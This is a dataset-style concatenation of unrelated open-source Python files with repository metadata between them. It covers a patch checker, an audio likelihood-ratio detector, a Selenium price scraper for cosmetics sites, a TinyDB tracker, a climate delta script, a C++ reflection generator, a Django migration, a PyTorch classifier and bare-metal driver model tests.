"""
unused_patches = set()
for path in patches_dir.rglob('*'):
if path.is_dir():
continue
if path.suffix in _PATCHES_IGNORE_SUFFIXES:
continue
unused_patches.add(str(path.relative_to(patches_dir)))
unused_patches -= set(_read_series_file(patches_dir, series_path))
unused_patches.remove(str(series_path))
logger = get_logger()
for entry in sorted(unused_patches):
logger.warning('Unused patch: %s', entry)
return bool(unused_patches)
def check_series_duplicates(patches_dir, series_path=Path('series')):
"""
Checks if there are duplicate entries in the series file
series_path is a pathlib.Path to the series file relative to the patches_dir
returns True if there are duplicate entries; False otherwise.
"""
entries_seen = set()
for entry in _read_series_file(patches_dir, series_path):
if entry in entries_seen:
get_logger().warning('Patch appears more than once in series: %s', entry)
return True
entries_seen.add(entry)
return False
def main():
"""CLI entrypoint"""
root_dir = Path(__file__).resolve().parent.parent
default_patches_dir = root_dir / 'patches'
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument(
'-p',
'--patches',
type=Path,
default=default_patches_dir,
help='Path to the patches directory to use. Default: %(default)s')
args = parser.parse_args()
warnings = False
warnings |= check_patch_readability(args.patches)
warnings |= check_series_duplicates(args.patches)
warnings |= check_unused_patches(args.patches)
if warnings:
exit(1)
exit(0)
if __name__ == '__main__':
main()
| 30.886525
| 85
| 0.679679
|
4a04e449f927196d2489985bf8319d6c891853bb
| 4,126
|
py
|
Python
|
video_generator.py
|
ArthurFDLR/SwainsonsThrush-detector
|
ce304ffc580380887261af30a02d1fc5ad231aba
|
[
"MIT"
] | null | null | null |
video_generator.py
|
ArthurFDLR/SwainsonsThrush-detector
|
ce304ffc580380887261af30a02d1fc5ad231aba
|
[
"MIT"
] | null | null | null |
video_generator.py
|
ArthurFDLR/SwainsonsThrush-detector
|
ce304ffc580380887261af30a02d1fc5ad231aba
|
[
"MIT"
] | null | null | null |
import scipy.io.wavfile
import scipy.signal
import matplotlib.pyplot as plt
import numpy as np
from tqdm import tqdm
import pathlib
import os
CURRENT_PATH = pathlib.Path(__file__).parent.absolute()
def ln_GLRT(s_array:np.ndarray, x_array:np.ndarray) -> np.ndarray:
""" Compute the value of natural logarithm of the generalized likelihood ratio along the signal x_array using the template s_array.
Args:
s_array (np.ndarray): Template to detect
x_array (np.ndarray): Signal to analyze
Returns:
np.ndarray: Natural logarithm of the generalized likelihood ratio test
"""
assert s_array.ndim == x_array.ndim == 1
N = s_array.shape[0]
GLRT_out = []
print('\n## Generalized Likelihood Ration Computation ##')
for n_0 in tqdm(range(x_array.shape[0] - N)):
x_array_truncate = x_array[n_0:n_0+N]
A_MLE = np.sum(np.multiply(s_array,x_array_truncate)) / np.sum(np.square(s_array))
sigma2_0_MLE = np.average(np.square(x_array_truncate))
sigma2_1_MLE = np.average(np.square(x_array_truncate - (A_MLE * s_array)))
GLRT_out.append( (N/2.0) * (np.log(sigma2_0_MLE) - np.log(sigma2_1_MLE)) )
return np.array(GLRT_out)
def create_video(template_URL:pathlib.Path, signal_URL:pathlib.Path, frame_rate:int, name:str):
""" Generate a sequence of frames to visualize the evolution of the generalized likelihood ratio in real-time.
The user can overlay the image sequence on the video from which the signal comes from.
Args:
template_URL (pathlib.Path): Path to the audio file (.wav) used as template for the computation of the generalized likelihood ratio
signal_URL (pathlib.Path): Path to the audio file (.wav) used as signal for the computation of the generalized likelihood ratio
frame_rate (int): Number of frame generated per second of audio file
name (str): Name of the image sequence
"""
saving_path = CURRENT_PATH / 'video' / 'python_export'
assert saving_path.exists()
assert template_URL.is_file()
assert signal_URL.is_file()
# Read wav files
template_samplerate, template_WAV = scipy.io.wavfile.read(template_URL)
signal_samplerate, signal_WAV = scipy.io.wavfile.read(signal_URL)
assert template_samplerate == signal_samplerate
#signal_WAV = signal_WAV[:signal_samplerate*5]
signal_size = signal_WAV.shape[0]
signal_min = signal_WAV.min()
signal_max = signal_WAV.max()
# Get Likelihood ratio
signal_lnGLRT = ln_GLRT(template_WAV, signal_WAV)
signal_lnGLRT_size = signal_lnGLRT.shape[0]
signal_lnGLRT_max = signal_lnGLRT.max()
# Draw plot
signal_timeline = np.linspace(0, signal_size/signal_samplerate, signal_size)
signal_lnGLRT_timeline = np.linspace(0, signal_lnGLRT_size/signal_samplerate, signal_lnGLRT_size)
# Initialize graph
fig, ax = plt.subplots(figsize=(10,4))
ax_bis = ax.twinx()
fig.subplots_adjust(left=0.1, right=0.9, top=0.9, bottom=0.1)
# Create frames
timestamps = np.arange(0, signal_lnGLRT_size, int(signal_samplerate/frame_rate))
saving_path /= name
if not saving_path.exists():
os.mkdir(saving_path)
print('\n## Frames generetion ##')
for i in tqdm(range(timestamps.shape[0])):
t = timestamps[i]
ax.clear()
ax_bis.clear()
ax.axis('off')
ax_bis.axis('off')
ax_bis.set_xlim(0, signal_size)
ax_bis.set_ylim(0, signal_lnGLRT_max)
ax.set_xlim(0, signal_size)
ax.set_ylim(signal_min, signal_max*2)
ax.plot(signal_WAV[:t], color='grey', alpha=.7, linewidth=.5)
ax_bis.plot(signal_lnGLRT[:t], color='#9500ff', linewidth=1.)
fig.savefig(saving_path / (name + '_{}.png'.format(i)), transparent=True, dpi=192, pad_inches=0.)
if __name__ == "__main__":
plt.style.use('ggplot')
template_path = CURRENT_PATH / 'audio_files' / 'template' / 'call_2.wav'
signal_path = CURRENT_PATH / 'audio_files' / 'signals' / 'nature_1.wav'
create_video(template_path, signal_path, 30, 'nature1_call2')
| 35.878261
| 139
| 0.692923
|
4a04e483f58b592b661388a28fd37bb8827f6846
| 4,551
|
py
|
Python
|
Main.py
|
syzadele/CosmeticScanner
|
4834977b7b54a17324b88513cff84c3d6f6ff63e
|
[
"Apache-2.0"
] | null | null | null |
Main.py
|
syzadele/CosmeticScanner
|
4834977b7b54a17324b88513cff84c3d6f6ff63e
|
[
"Apache-2.0"
] | null | null | null |
Main.py
|
syzadele/CosmeticScanner
|
4834977b7b54a17324b88513cff84c3d6f6ff63e
|
[
"Apache-2.0"
] | null | null | null |
import requests
import codecs
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from email.mime import image
from test.test_email import openfile
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
def getWebPage(productName):
# Open Login page
driver = webdriver.Chrome()
driver.get("https://www.sephora.fr/secure/user/login.jsp")
# Check title
assert "Sephora" in driver.title
# Fill login and password and login
import InfoLogin
element = driver.find_element_by_id("cmail")
element.send_keys(InfoLogin.SEPHORA_LOGIN)
element = driver.find_element_by_id("cpasse")
element.send_keys(InfoLogin.SEPHORA_PW)
element.send_keys(Keys.RETURN)
# Fill searche bar
element = driver.find_element_by_id("champRecherche")
element.send_keys(productName)
element.send_keys(Keys.RETURN)
htmlSource = (driver.page_source).encode('utf-8')
return htmlSource
def getWebPageM(productName):
#open Login page
driver = webdriver.Chrome()
driver.get("https://www.marionnaud.fr/login")
#Check title
assert "Login" in driver.title
#Fill login and password and login
import InfoLogin
element = driver.find_element_by_id("j_username")
element.send_keys(InfoLogin.MARIONNAUD_LOGIN)
element = driver.find_element_by_id("j_password")
element.send_keys(InfoLogin.MARIONNAUD_PW)
element.send_keys(Keys.RETURN)
#Fill searche bar
element = driver.find_element_by_name("text")
element.send_keys(productName)
element.send_keys(Keys.RETURN)
htmlSource = driver.page_source
return htmlSource
def getWebPageN(productName):
#open Login page
driver = webdriver.Chrome()
driver.get("https://www.nocibe.fr/nocibe/CustomerConnection?StoreID=1&CatalogueID=1&LangueID=1")
print(driver.title)
#Check title
assert "Nocibé" in driver.title
#Fill login and password and login
import InfoLogin
element = driver.find_element_by_xpath("//div[@id='identification-user']//input[@id='email']")
element.send_keys(InfoLogin.NOCIBE_LOGIN)
#element = driver.find_element_by_id("email")
element = driver.find_element_by_id("mdp1")
element.send_keys(InfoLogin.NOCIBE_PW)
element.send_keys(Keys.RETURN)
#Fill searche bar
wait = WebDriverWait(driver, 10)
wait.until(EC.visibility_of_element_located((By.XPATH, "//div[@class='col-xs-3']/div[@class='menu-compte mb-20 mt-25']")))
element = driver.find_element_by_id("Rechercher")
element.click()
element.send_keys(productName)
element.send_keys(Keys.RETURN)
htmlSource = driver.page_source
return htmlSource
def openFile(path):
f = codecs.open(path, 'r', 'utf-8')
#f.write(htmlSource)
#print (htmlSource)
sourceCode = f.read()
f.close()
return sourceCode
def getPrice(content):
i = 1
listResult = []
soup = BeautifulSoup(content, "lxml")
for product in soup.find_all(attrs={'class' : 'searchClassique'}, limit=6):
libelle = product.find("p", class_="libelle").text
price = product.find("p", class_="prix").text
image = product.find("img", {"class":"lazy"})
img_link = image['src']
print(str(i) + libelle + price + str(img_link))
listResult.insert(i,(i,img_link,libelle,price))
i = i+1
return listResult
def getPriceM(content):
i=1
listResult = []
soup = BeautifulSoup(content,"lxml")
for product in soup.find_all(attrs={'class' : 'col-lg-3 col-md-3 col-sm-4'}, limit=6):
libelle = product.find("div", class_="product_name").text
price = product.find("div", class_="price").text
image = product.find("div", {"class":"product_img"})
img_link = image.img['src']
listResult.insert(i,(i,img_link,libelle,price))
i=i+1
return listResult
def getPriceN(content):
i=1
listResult = []
soup = BeautifulSoup(content,"lxml")
for product in soup.find_all(attrs={"class": "pl_produit pl_produit--lowline col-xs-3"}, limit=6):
libelle = product.find("div", class_="pl_accroche").text
price = product.find("div", class_="pl_prix").text
image = product.find("div", class_="pl_image")
img_link = image.a.img['src']
listResult.insert(i,(i,img_link,libelle,price))
i=i+1
return listResult
| 33.218978
| 126
| 0.686662
|
4a04e4c0c840fcec22a61a45d6570509cd073978
| 2,438
|
py
|
Python
|
octo_train/db/tinydbdatabase.py
|
dankondr/octo-train
|
3d1b38b498b3f551bff33410d64ffebc387b9e0f
|
[
"MIT"
] | 2
|
2020-04-09T17:16:16.000Z
|
2020-04-10T00:16:18.000Z
|
octo_train/db/tinydbdatabase.py
|
dankondr/octo-train
|
3d1b38b498b3f551bff33410d64ffebc387b9e0f
|
[
"MIT"
] | null | null | null |
octo_train/db/tinydbdatabase.py
|
dankondr/octo-train
|
3d1b38b498b3f551bff33410d64ffebc387b9e0f
|
[
"MIT"
] | null | null | null |
from datetime import datetime
from random import randint
from tinydb import TinyDB, where
from octo_train.db.database_interface import IDatabase
class TinyDBDatabase(IDatabase):
_DATE_FORMAT = '%d.%m.%y'
def __init__(self, path_to_db):
self.db = TinyDB(path_to_db)
self.user = None
self.loaded = False
if self.db.contains(where('name')):
self.loaded = True
self.user = self._get_user()
def new_user(self, **kwargs):
self.db.insert(kwargs)
self.user = self._get_user()
def get_stats(self):
pass
def solved_today(self, problem_type):
today = self._get_today_date()
st = self.db.search((where('date') == today)
& (where('problem_type') == problem_type)
& (where('solved') == True))
return len(st)
def get_solved(self, problem_type):
l = self.db.search((where('problem_type') == problem_type) & (where('solved') == True))
result = set()
for item in l:
result.add(item['link'])
return result
def get_not_solved(self, problem_type):
l = self.db.search((where('problem_type') == problem_type) & (where('solved') == False))
result = set()
for item in l:
result.add(item['link'])
return result
def get_all(self, problem_type):
l = self.db.search(where('problem_type') == problem_type)
result = set()
for item in l:
result.add(item['link'])
return result
def get_not_solved_problem(self, problem_type):
l = self.db.search((where('problem_type') == problem_type) & (where('solved') == False))
if not l:
return None
problem_number = randint(0, len(l) - 1)
problem = l[problem_number]
self.db.remove(where('link') == problem['link'])
return problem
def insert(self, problem_data):
problem_data['date'] = self._get_today_date()
self.db.insert(problem_data)
def update_user(self, key, value):
self.user[key] = value
self.db.write_back([self.user])
def _get_user(self):
try:
user = self.db.search(where('name'))[0]
except IndexError:
raise
else:
return user
def _get_today_date(self):
return datetime.now().strftime(self._DATE_FORMAT)
| 30.098765
| 96
| 0.578753
|
4a04e4cc59a680365e1cc183628b5134ba211ccb
| 2,532
|
py
|
Python
|
code/Access_delta.py
|
rodrigoms95/herramientas-climatico-22-1
|
a85a941e6680637b7b595ad534ce6775328707c8
|
[
"BSD-3-Clause"
] | null | null | null |
code/Access_delta.py
|
rodrigoms95/herramientas-climatico-22-1
|
a85a941e6680637b7b595ad534ce6775328707c8
|
[
"BSD-3-Clause"
] | null | null | null |
code/Access_delta.py
|
rodrigoms95/herramientas-climatico-22-1
|
a85a941e6680637b7b595ad534ce6775328707c8
|
[
"BSD-3-Clause"
] | null | null | null |
# Obtiene el delta de temperatura entre el periodo 1970-2000
# y 2020-2040 con datos del modelo Access.
import os
import xarray as xr
modelo = "Access"
path_d= os.getcwd() + "/datos/" + modelo + "/"
path_r = os.getcwd() + "/resultados/" + modelo + "/"
name = ["tas_Amon_ACCESS1-0_historical_r1i1p1_185001-200512.nc",
"tas_Amon_ACCESS1-0_rcp85_r1i1p1_200601-210012.nc",
"hist", "proy", "delta"]
# Si no existe la carpeta, la crea.
if not os.path.exists(path_r):
os.mkdir(path_r)
# Año de inicio y de fin de climatología, inclusive.
with open(os.getcwd() + "/resultados/periodos", "r") as f:
yr_i = [f.readline()[:-1]]
yr_f = [f.readline()[:-1]]
yr_i.append(f.readline()[:-1])
yr_f.append(f.readline()[:-1])
ds = []
vars = ["height", "time_bnds", "lat_bnds", "lon_bnds"]
# Se abre el archivo histórico y luego la proyección.
for i in range(0, 2):
ds.append(xr.load_dataset(
path_d + name[i]).drop(vars))
# Se selecciona el periodo deseado.
ds[i] = ds[i].sel(time = slice(yr_i[i], yr_f[i]))
# Se obtiene la media mensual.
ds[i] = ds[i].groupby("time.month").mean()
# Se ajustan los valores de la longitud para que estén
# en el rango (-180, 180).
ds[i]["lon_ajus"] = xr.where(
ds[i]["lon"] > 180,
ds[i]["lon"] - 360,
ds[i]["lon"])
# Se ajustan los valores de la longitud para que estén
# en el rango (-180, 180).
ds[i] = (ds[i]
.swap_dims(lon = "lon_ajus")
.sel(lon_ajus = sorted(ds[i].lon_ajus))
.drop("lon"))
ds[i] = ds[i].rename(lon_ajus = "lon")
# Se guarda el netCDF.
ds[i].to_netcdf(
path_r + "Access_clim_" + name[i + 2]
+ "_" + str(yr_i[i]) + "_" + str(yr_f[i])
+ "_monthly.nc"
)
i = 2
# Se calcula el delta restando la climatología
# proyectada y la histórica del modelo.
ds.append(ds[1] - ds[0])
# Se ajustan los valores de la longitud para que estén
# en el rango (-180, 180).
ds[i]["lon_ajus"] = xr.where(
ds[i]["lon"] > 180,
ds[i]["lon"] - 360,
ds[i]["lon"])
# Se reasignan las nuevas dimensiones como las
# principales dimensiones de longitud y se reordenan
# los datos.
ds[i] = (ds[i]
.swap_dims(lon = "lon_ajus")
.sel(lon_ajus = sorted(ds[i].lon_ajus))
.drop("lon"))
ds[i] = ds[i].rename(lon_ajus = "lon")
# Se guarda el netCDF.
ds[i].to_netcdf(
path_r + modelo + "_" + name[i + 2] + "_"
+ str(yr_i[0]) + "_" + str(yr_f[0]) + "_"
+ str(yr_i[1]) + "_" + str(yr_f[1])+
"_monthly.nc"
)
| 26.93617
| 64
| 0.593602
|
4a04e6d400c8fde598373ba480fcda1be2f82463
| 2,304
|
py
|
Python
|
source/Library/reflection/Reflection.py
|
JarrettWendt/FIEAEngine
|
0bf7e89cd66fec29550f7d7a1a11f5cf398c27e5
|
[
"MIT"
] | 2
|
2020-05-27T14:01:39.000Z
|
2022-03-21T09:11:58.000Z
|
source/Library/reflection/Reflection.py
|
JarrettWendt/FIEAEngine
|
0bf7e89cd66fec29550f7d7a1a11f5cf398c27e5
|
[
"MIT"
] | null | null | null |
source/Library/reflection/Reflection.py
|
JarrettWendt/FIEAEngine
|
0bf7e89cd66fec29550f7d7a1a11f5cf398c27e5
|
[
"MIT"
] | null | null | null |
import os, sys
from pathlib import Path
# TODO:
# Don't assume the filename is the class name.
# Do some syntax checking with the KEYWORDS instead of just ignoring them.
# Come up with a cleaner way to encode the indentation, perhaps at the cost of double-parsing the string.
# Use a library for real C++ parsing.
# Make this work for nested types and for when the namespace declaration isn't all on one line.
# Returns whether or not the line of code is commented out.
def isCommentedOut(line):
line = line.lstrip()
return line.startswith('//') or line.startswith('/*')
#
class ClassInfo:
def __init__(self, path = ''):
self.namespace = ''
self.path = path;
self.className = ''
def __str__(self):
return '{ "' + self.className + '", [] { return std::make_shared<' + self.scopeResolvedClass() + '>(); } }'
# Get the scope resolved class. Ex: 'MyNamespace::MyClass'
def scopeResolvedClass(self):
return self.namespace + '::' + self.className
rootPaths = [os.path.abspath(arg) for arg in sys.argv[1:]] if len(sys.argv) > 1 else [os.path.abspath('..')]
destFile = rootPaths[0] + '/.generated/Reflection.generated.cpp'
print("Generating Reflectables under paths " + str(rootPaths))
print("Will export to " + str(destFile))
classInfos = []
# Recursively go through all header files.
for rootPath in rootPaths:
for extension in ['*.h', "*.hh", "*.hpp"]:
for path in Path(rootPath).rglob(extension):
with open(path, 'r') as file:
classInfo = ClassInfo(path)
for line in file:
if 'namespace' in line :
classInfo.namespace = line.split()[-1]
if not isCommentedOut(line):
if '[[Reflectable]]' in line:
try:
classInfo.className = next(file).split()[1]
classInfos.append(classInfo)
except Exception:
pass
# Finally, generate the string we'll write to the file.
string = """#include "pch.h"
#include "Reflection.h"
"""
for classInfo in classInfos:
string += '#include "' + classInfo.path.as_posix() + '"\n'
string += """
namespace Library
{
const HashMap<std::string, std::function<std::shared_ptr<void>()>> Reflection::constructors =
{
"""
for classInfo in classInfos:
string += '\t\t' + str(classInfo) + ',\n'
string += """ };
}
"""
with open(destFile, 'w') as file:
file.write(string)
file.close()
| 28.097561
| 109
| 0.670139
|
4a04e7734422842189da8d7db232303546d54d5a
| 788
|
py
|
Python
|
account/migrations/0008_auto_20200415_1840.py
|
TolimanStaR/Course-Work
|
79dbfcbaef0ae79209295fe8d36b6fd9610e99b8
|
[
"MIT"
] | 1
|
2020-03-31T22:09:34.000Z
|
2020-03-31T22:09:34.000Z
|
account/migrations/0008_auto_20200415_1840.py
|
TolimanStaR/Course-Work
|
79dbfcbaef0ae79209295fe8d36b6fd9610e99b8
|
[
"MIT"
] | 8
|
2021-03-30T14:20:10.000Z
|
2022-03-12T00:52:03.000Z
|
account/migrations/0008_auto_20200415_1840.py
|
TolimanStaR/Course-Work
|
79dbfcbaef0ae79209295fe8d36b6fd9610e99b8
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2.9 on 2020-04-15 15:40
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('account', '0007_auto_20200415_1707'),
]
operations = [
migrations.AlterField(
model_name='userprofile',
name='contest_rang',
field=models.CharField(choices=[('Новичек', 'Новичек'), ('Лиманадек', 'Лиманадек'), ('Черниговский батон', 'Черниговский батон'), ('Сыр косичка', 'Сыр косичка'), ('Масленок', 'Масленок'), ("Советский for'ик", "Советский for'ик"), ('Живой огурец', 'Живой огурец'), ('Мафиозник', 'Мафиозник'), ('Олимпиадник', 'Олимпиадник'), ('Sensei', 'Sensei'), ('Галактический кодер', 'Галактический кодер')], default='Новичек', max_length=45),
),
]
| 41.473684
| 441
| 0.638325
|
4a04e81bc52758d3933b202384d7b24cac6607be
| 267
|
py
|
Python
|
config.py
|
parshnt/gclass-bot
|
d0ce5fe48fccb7c481b18d06e111c623bfe37e67
|
[
"MIT"
] | 2
|
2021-08-24T19:26:51.000Z
|
2022-03-04T12:21:34.000Z
|
config.py
|
parshnt/gclass-bot
|
d0ce5fe48fccb7c481b18d06e111c623bfe37e67
|
[
"MIT"
] | null | null | null |
config.py
|
parshnt/gclass-bot
|
d0ce5fe48fccb7c481b18d06e111c623bfe37e67
|
[
"MIT"
] | null | null | null |
# EMAIL & PASS FOR YOUR G-ACCOUNT
PASS = ""
EMAIL = ""
# YOUR G-CLASSROOM/G-MEET URL
CLASSROOM_URL = ""
# IF NUMBER OF PEOPLE IN MEETING GETS BELOW THIS, YOU'LL LEAVE THE MEETING AUTOMATICALLY
# KEEP IT 0, IF YOU DON'T WANT TO USE THIS FEATURE
THRESHOLD_PEOPLE = 0
| 24.272727
| 88
| 0.719101
|
4a04e8b6ed2a66e7acd5bdfca9acd9dfed4a036b
| 1,749
|
py
|
Python
|
python/openradar/db.py
|
manicmaniac/openradar
|
1f0401165f4e5b67b9a06bbdbeb2fc612d6b8e8e
|
[
"Apache-2.0"
] | 264
|
2015-01-07T18:48:55.000Z
|
2022-02-07T15:09:59.000Z
|
python/openradar/db.py
|
manicmaniac/openradar
|
1f0401165f4e5b67b9a06bbdbeb2fc612d6b8e8e
|
[
"Apache-2.0"
] | 32
|
2015-01-12T08:39:16.000Z
|
2022-03-26T10:30:08.000Z
|
python/openradar/db.py
|
manicmaniac/openradar
|
1f0401165f4e5b67b9a06bbdbeb2fc612d6b8e8e
|
[
"Apache-2.0"
] | 28
|
2015-04-07T05:26:08.000Z
|
2022-02-22T09:14:54.000Z
|
"""@package docstring
Provides database access for models.
"""
import models
class Radar():
def fetchAll(self, page = 1, count = 100):
return models.Radar.gql("ORDER BY number DESC").fetch(count, offset=(page - 1) * count)
def fetchCount(self):
return models.Radar.all().count(limit=100000)
def fetchById(self, id):
return models.Radar.get_by_id(id)
def fetchByNumber(self, number):
return models.Radar.gql("WHERE number = :1", number).get()
def fetchByNumbers(self, numbers, page = 1, count = 100):
return models.Radar.gql("WHERE number IN :1", numbers).fetch(count, offset=(page - 1) * count)
def fetchByUser(self, user, page = 1, count = 100):
return models.Radar.gql("WHERE user = :1 ORDER BY number DESC", user).fetch(count, offset=(page - 1) * count)
def fetchByUsers(self, users, page = 1, count = 100):
return models.Radar.gql("WHERE user IN :1 ORDER BY number DESC", users).fetch(count, offset=(page - 1) * count)
class Comment():
def fetchAll(self, page = 1, count = 100):
return models.Comment.gql("ORDER BY posted_at DESC").fetch(count, offset=(page - 1) * count)
def fetchCount(self):
return models.Comment.all().count(limit=100000)
def fetchByUser(self, user, page = 1, count = 100):
return models.Comment.gql("WHERE user = :1 ORDER BY posted_at DESC", user).fetch(count, offset=(page - 1) * count)
class APIKey():
def fetchByUser(self, user):
return models.APIKey.gql("WHERE user = :1", user).get()
def fetchByAPIKey(self, apikey):
return models.APIKey.gql("WHERE apikey = :1", apikey).get()
| 38.021739
| 122
| 0.618639
|
4a04e970484b8ed63ccfd49457e0826cf71042da
| 3,182
|
py
|
Python
|
code/model_classifier.py
|
acids-ircam/lottery_mir
|
1440d717d7fd688ac43c1a406602aaf2d5a3842d
|
[
"MIT"
] | 10
|
2020-07-29T23:12:15.000Z
|
2022-03-23T16:27:43.000Z
|
code/model_classifier.py
|
acids-ircam/lottery_mir
|
1440d717d7fd688ac43c1a406602aaf2d5a3842d
|
[
"MIT"
] | null | null | null |
code/model_classifier.py
|
acids-ircam/lottery_mir
|
1440d717d7fd688ac43c1a406602aaf2d5a3842d
|
[
"MIT"
] | 1
|
2022-02-06T11:42:28.000Z
|
2022-02-06T11:42:28.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 23 17:41:02 2020
@author: esling
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from model import LotteryClassification
"""
Here we define a dilated 1d-CNN model for general purpose waveform classification
This model will serve for both the tasks of
- Instrument recongition
- Singing mode classification
"""
# Global variables
instruments = ['bn','cl','db','fl','hn','ob','sax','tba','tbn','tpt','va','vc','vn']
class WaveformCNN(nn.Module):
def __init__(self, args):
super(WaveformCNN, self).__init__()
in_size = np.prod(args.input_size)
out_size = np.prod(args.output_size)
hidden_size = args.n_hidden
n_layers = args.n_layers
channels = args.channels
n_mlp = args.n_layers
# Create modules
modules = nn.Sequential()
self.in_size = in_size
size = in_size
in_channel = 1
kernel = args.kernel
stride = kernel // 16
""" First do a CNN """
for l in range(n_layers):
dil = ((args.dilation == 3) and (2 ** l) or args.dilation)
pad = 3 * (dil + 1)
in_s = (l==0) and in_channel or channels
out_s = (l == n_layers - 1) and 1 or channels
modules.add_module('c2%i'%l, nn.Conv1d(in_s, out_s, kernel, stride, pad, dilation = dil))
if (l < n_layers - 1):
modules.add_module('b2%i'%l, nn.BatchNorm1d(out_s))
modules.add_module('a2%i'%l, nn.ReLU())
modules.add_module('d2%i'%l, nn.Dropout2d(p=.25))
size = int((size+2*pad-(dil*(kernel-1)+1))/stride+1)
modules[-1].unprunable = True
self.net = modules
self.mlp = nn.Sequential()
""" Then go through MLP """
for l in range(n_mlp):
in_s = (l==0) and (size) or hidden_size
out_s = (l == n_mlp - 1) and out_size or hidden_size
self.mlp.add_module('h%i'%l, nn.Linear(in_s, out_s))
if (l < n_layers - 1):
self.mlp.add_module('b%i'%l, nn.BatchNorm1d(out_s))
self.mlp.add_module('a%i'%l, nn.ReLU())
self.mlp.add_module('d%i'%l, nn.Dropout(p=.25))
self.mlp[-1].unprunable = True
self.cnn_size = size
def init_parameters(self):
""" Initialize internal parameters (sub-modules) """
for param in self.parameters():
param.data.uniform_(-0.01, 0.01)
def forward(self, x):
x = x.view(-1, 1, self.in_size)
out = x
for m in range(len(self.net)):
out = self.net[m](out)
#print(out.shape)
out = out.view(x.shape[0], -1)
for m in range(len(self.mlp)):
out = self.mlp[m](out)
#print(out.shape)
return out
"""
Model bottle inheritance
"""
class LotteryClassifierCNN(LotteryClassification, WaveformCNN):
def __init__(self, args):
super(LotteryClassifierCNN, self).__init__(args)
WaveformCNN.__init__(self, args)
self.pruning = args.pruning
| 31.82
| 101
| 0.570082
|
4a04ea3a06ccd927cca5332fdc78ad899cae524a
| 8,060
|
py
|
Python
|
metatests/cloudcafe/bare_metal/drivers/models/test_driver_responses.py
|
rcbops-qa/cloudcafe
|
d937f85496aadafbb94a330b9adb8ea18bee79ba
|
[
"Apache-2.0"
] | null | null | null |
metatests/cloudcafe/bare_metal/drivers/models/test_driver_responses.py
|
rcbops-qa/cloudcafe
|
d937f85496aadafbb94a330b9adb8ea18bee79ba
|
[
"Apache-2.0"
] | null | null | null |
metatests/cloudcafe/bare_metal/drivers/models/test_driver_responses.py
|
rcbops-qa/cloudcafe
|
d937f85496aadafbb94a330b9adb8ea18bee79ba
|
[
"Apache-2.0"
] | 1
|
2020-04-13T17:44:28.000Z
|
2020-04-13T17:44:28.000Z
|
"""
Copyright 2014 Rackspace
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
from cloudcafe.bare_metal.drivers.models.responses import Driver, Drivers
class DriversModelTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.drivers_json_response = \
"""
{
"drivers":[
{
"hosts":[
"localhost"
],
"name":"fake_ipminative",
"links":[
{
"href":"http://local:6385/v1/drivers/ipminative",
"rel":"self"
},
{
"href":"http://local:6385/drivers/ipminative",
"rel":"bookmark"
}
]
},
{
"hosts":[
"localhost"
],
"name":"p_ipminative",
"links":[
{
"href":"http://local:6385/v1/drivers/p_ipminative",
"rel":"self"
},
{
"href":"http://local:6385/drivers/p_ipminative",
"rel":"bookmark"
}
]
},
{
"hosts":[
"localhost"
],
"name":"fake_pxe",
"links":[
{
"href":"http://local:6385/v1/drivers/fake_pxe",
"rel":"self"
},
{
"href":"http://local:6385/drivers/fake_pxe",
"rel":"bookmark"
}
]
},
{
"hosts":[
"localhost"
],
"name":"fake_ssh",
"links":[
{
"href":"http://local:6385/v1/drivers/fake_ssh",
"rel":"self"
},
{
"href":"http://local:6385/drivers/fake_ssh",
"rel":"bookmark"
}
]
},
{
"hosts":[
"localhost"
],
"name":"fake_ipmitool",
"links":[
{
"href":"http://local:6385/v1/drivers/fake_ipmitool",
"rel":"self"
},
{
"href":"http://local:6385/drivers/fake_ipmitool",
"rel":"bookmark"
}
]
},
{
"hosts":[
"localhost"
],
"name":"fake",
"links":[
{
"href":"http://local:6385/v1/drivers/fake",
"rel":"self"
},
{
"href":"http://local:6385/drivers/fake",
"rel":"bookmark"
}
]
},
{
"hosts":[
"localhost"
],
"name":"pxe_ssh",
"links":[
{
"href":"http://local:6385/v1/drivers/pxe_ssh",
"rel":"self"
},
{
"href":"http://local:6385/drivers/pxe_ssh",
"rel":"bookmark"
}
]
},
{
"hosts":[
"localhost"
],
"name":"pxe_ipmitool",
"links":[
{
"href":"http://local:6385/v1/drivers/pxe_ipmitool",
"rel":"self"
},
{
"href":"http://local:6385/drivers/pxe_ipmitool",
"rel":"bookmark"
}
]
}
]
}
"""
cls.drivers = Drivers.deserialize(cls.drivers_json_response, 'json')
def test_list_drivers(self):
self.assertEqual(len(self.drivers), 8)
def test_drivers_in_list(self):
self.assertTrue(
any([driver for driver in self.drivers
if driver.name == 'fake_ipminative']))
self.assertTrue(
any([driver for driver in self.drivers
if driver.name == 'p_ipminative']))
self.assertTrue(
any([driver for driver in self.drivers
if driver.name == 'fake_pxe']))
self.assertTrue(
any([driver for driver in self.drivers
if driver.name == 'fake_ssh']))
self.assertTrue(
any([driver for driver in self.drivers
if driver.name == 'fake_ipmitool']))
self.assertTrue(
any([driver for driver in self.drivers
if driver.name == 'fake']))
self.assertTrue(
any([driver for driver in self.drivers
if driver.name == 'pxe_ssh']))
self.assertTrue(
any([driver for driver in self.drivers
if driver.name == 'pxe_ipmitool']))
class DriverModelTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.driver_json_response = \
"""
{
"hosts":[
"localhost"
],
"name":"fake",
"links":[
{
"href":"http://192.168.159.128:6385/v1/drivers/fake",
"rel":"self"
},
{
"href":"http://192.168.159.128:6385/drivers/fake",
"rel":"bookmark"
}
]
}
"""
cls.driver = Driver.deserialize(cls.driver_json_response, 'json')
def test_driver_name(self):
self.assertEqual(self.driver.name, "fake")
def test_driver_hosts(self):
self.assertEqual(len(self.driver.hosts), 1)
